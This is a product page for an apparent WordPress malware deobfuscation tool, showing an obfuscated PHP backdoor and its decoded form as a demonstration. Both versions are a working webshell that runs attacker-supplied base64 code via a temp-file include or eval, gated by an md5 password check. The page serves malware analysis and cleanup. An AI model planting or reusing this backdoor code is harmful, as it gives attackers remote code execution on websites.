Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
$bnlqr = array_merge($_GET, $_COOKIE, $_POST);
$kfjbs = 'in_' . 'ar' . 'ray';
if ($bnlqr['m'] == '1') die('d3fa8bd72798457b3b865c6ee12c1e6c');
if (md5($bnlqr['ad975']) === 'd3fa8bd72798457b3b865c6ee12c1e6c') agvtc($bnlqr);
function agvtc($lozgt)
{
$thxir = 'fi' . 'le_' . 'exi' . 'sts';
$rqrop = 'f' . 'op' . 'en';
$mhyau = 'f' . 'cl' . 'ose';
$iqwlb = 'u' . 'nl' . 'ink';
if ($thxir('./wp-sale.js')) {
@$iqwlb('./wp-sale.js');
}
$kzmne = 't' . 'mpf' . 'ile';
$cfyeu = 'fw' . 'rite';
$doyng = 'fs' . 'eek';
$amsaj = 'ba' . 'se' . chr(54) . chr(52) . chr(95) . chr(100) . chr(101) . chr(99) . 'o' . chr(100) . chr(101);
$kfjbs = 'str' . 'ea' . 'm_' . 'get' . '_m' . 'eta' . '_' . 'data';
$nemqs = $kzmne();
if (fwrite($nemqs, chr(60) . chr(63) . chr(112) . chr(104) . chr(112) . chr(32) . $amsaj($lozgt['a287b'])) != false) {
include($kfjbs($nemqs)['uri']);
$mhyau($nemqs);
} else {
@eval($amsaj($lozgt['a287b']));
}
}<?php
$bnlqr = array_merge($_GET, $_COOKIE, $_POST);
$kfjbs = 'in_array';
if ($bnlqr['m'] == '1') {
die('d3fa8bd72798457b3b865c6ee12c1e6c');
}
if (md5($bnlqr['ad975']) === 'd3fa8bd72798457b3b865c6ee12c1e6c') {
agvtc($bnlqr);
}
function agvtc($lozgt)
{
$thxir = 'file_exists';
$rqrop = 'fopen';
$mhyau = 'fclose';
$iqwlb = 'unlink';
if (file_exists('./wp-sale.js')) {
@unlink('./wp-sale.js');
}
$kzmne = 'tmpfile';
$cfyeu = 'fwrite';
$doyng = 'fseek';
$amsaj = "base64_decode";
$kfjbs = 'stream_get_meta_data';
$nemqs = tmpfile();
if (fwrite($nemqs, "<?php " . base64_decode($lozgt['a287b'])) != false) {
include stream_get_meta_data($nemqs)['uri'];
$mhyau($nemqs);
} else {
@eval(base64_decode($lozgt['a287b']));
}
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.